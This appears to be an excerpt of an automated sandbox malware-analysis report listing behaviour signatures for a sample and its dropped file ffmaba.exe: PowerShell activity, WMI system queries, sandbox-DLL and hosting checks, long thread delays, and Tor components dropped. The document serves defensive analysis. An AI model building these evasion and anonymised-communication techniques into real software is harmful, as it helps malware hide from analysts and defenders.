                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: ffmaba.exe PID: 7784, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: ffmaba.exe PID: 2300, type: MEMORYSTR
                Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: AF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 2590000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 2490000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 57F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 67F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 6A20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 7A20000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 2A90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 2BD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Memory allocated: 4BD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Memory allocated: 2550000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Memory allocated: 27D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Memory allocated: 5A80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Memory allocated: 6A80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 2D80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 4D80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 6180000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 7180000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 73C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 83C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 9EA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: AEA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 6930000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 1070000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 2B90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 5E00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 6E00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 2DC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 2EC0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 6220000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 7220000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 2410000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 25F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 45F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 5940000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 6940000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 11D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 2E60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 2C40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 6120000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Memory allocated: 7120000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599782
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599657
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599532
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 599063
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598938
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598813
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 598110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 595110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 594096
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Thread delayed: delay time: 593969
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6893
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2756
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Window / User API: threadDelayed 6850
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Window / User API: threadDelayed 2982
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6689
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3097
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6101
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3646
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7889
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Window / User API: threadDelayed 6187
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Window / User API: threadDelayed 3589
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9158
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7736
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1950
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8662
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 668
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9321
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9532
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe API coverage: 0.2 %
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 6160 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 7684 Thread sleep time: -24903104499507879s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468 Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep count: 6101 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep count: 3646 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe TID: 7804 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -32281802128991695s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599891s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599782s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599657s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599532s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599422s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599313s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599188s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -599063s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598938s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598813s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598703s >= -30000s
